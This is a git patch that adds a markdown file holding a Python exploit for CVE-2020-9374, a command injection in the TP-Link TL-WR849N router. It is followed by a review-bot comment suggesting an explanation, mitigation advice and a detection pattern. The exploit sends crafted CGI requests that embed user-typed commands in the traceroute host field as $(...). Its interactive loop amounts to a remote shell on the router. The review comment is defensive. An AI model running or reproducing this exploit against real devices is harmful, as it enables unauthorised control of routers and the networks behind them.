From b7a5094d6eee7461b2ab6a9896cbbd5b5c25db88 Mon Sep 17 00:00:00 2001
From: Mrxn
Date: Mon, 2 Mar 2020 22:11:33 +0800
Subject: [PATCH] add CVE-2020-9374-TP LINK TL-WR849N - RCE
---
CVE-2020-9374.md | 64 ++++++++++++++++++++++++++++++++++++++++++++++++
1 file changed, 64 insertions(+)
create mode 100644 CVE-2020-9374.md
diff --git a/CVE-2020-9374.md b/CVE-2020-9374.md
new file mode 100644
index 0000000..53fde07
--- /dev/null
+++ b/CVE-2020-9374.md
@@ -0,0 +1,64 @@
+```python
+# Exploit Title: TP LINK TL-WR849N - Remote Code Execution
+# Date: 2019-11-20
+# Exploit Author: Elber Tavares
+# Vendor Homepage: https://www.tp-link.com/
+# Software Link: https://www.tp-link.com/br/support/download/tl-wr849n/#Firmware
+# Version: TL-WR849N 0.9.1 4.16
+# Tested on: linux, windows
+# CVE : CVE-2020-9374
+
+
+import requests
+
+def output(headers,cookies):
+ url = 'http://192.168.0.1/cgi?1'
+ data = ''
+ data += '[TRACEROUTE_DIAG#0,0,0,0,0,0#0,0,0,0,0,0]0,3\x0d\x0a'
+ data += 'diagnosticsState\x0d\x0a'
+ data += 'X_TP_HopSeq\x0d\x0a'
+ data += 'X_TP_Result\x0d\x0a'
+ r = requests.post(url,data=data,headers=headers,cookies=cookies)
+ saida = r.text
+ filtro = saida.replace(': Name or service not known','')
+ filtro = filtro.replace('[0,0,0,0,0,0]0','')
+ filtro = filtro.replace('diagnosticsState=','')
+ filtro = filtro.replace('X_TP_HopSeq=0','')
+ filtro = filtro.replace('X_TP_Result=','')
+ print(filtro[:-8])
+
+def aceppt(headers,cookies):
+ url = 'http://192.168.0.1/cgi?7'
+ data = '[ACT_OP_TRACERT#0,0,0,0,0,0#0,0,0,0,0,0]0,0\x0d\x0a'
+ r = requests.post(url,data=data,headers=headers,cookies=cookies)
+ output(headers,cookies)
+
+
+def inject(command,headers,cookies):
+ url = 'http://192.168.0.1/cgi?2'
+ data = ''
+ data += '[TRACEROUTE_DIAG#0,0,0,0,0,0#0,0,0,0,0,0]0,8\x0d\x0a'
+ data += 'maxHopCount=20\x0d\x0a'
+ data += 'timeout=5\x0d\x0a'
+ data += 'numberOfTries=1\x0d\x0a'
+ data += 'host=\"$('+command+')\"\x0d\x0a'
+ data += 'dataBlockSize=64\x0d\x0a'
+ data += 'X_TP_ConnName=ewan_pppoe\x0d\x0a'
+ data += 'diagnosticsState=Requested\x0d\x0a'
+ data += 'X_TP_HopSeq=0\x0d\x0a'
+ r = requests.post(url,data=data,headers=headers,cookies=cookies)
+ aceppt(headers,cookies)
+
+
+
+def main():
+ cookies = {"Authorization": "Basic REPLACEBASE64AUTH"}
+ headers = {'Content-Type': 'text/plain',
+ 'Referer': 'http://192.168.0.1/mainFrame.htm'}
+ while True:
+ command = input('$ ')
+ inject(command,headers,cookies)
+
+
+main()
+```
\ No newline at end of file
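Review bot: The new file is a single code fence with no prose, so nothing tells a reader what the flaw is, what it requires, or how to remediate it. From the visible lines, `inject` puts the supplied string inside `host="$(...)"` of the `TRACEROUTE_DIAG` request and `main` sends an `Authorization` cookie holding a Basic credential placeholder, which suggests an authenticated command injection in the router's traceroute diagnostic. A short paragraph above the fence should say so and repeat the affected build from the header (`TL-WR849N 0.9.1 4.16`). I would also add a defender-facing line such as `Mitigation: install the vendor's fixed firmware (<fixed version, confirm against the vendor advisory>), set a strong admin password, and keep the web management interface off untrusted networks.` A detection hint grounded in the listing would help too: a POST to `/cgi?2` whose `host=` field contains `$(` is not a valid traceroute target and is worth alerting on.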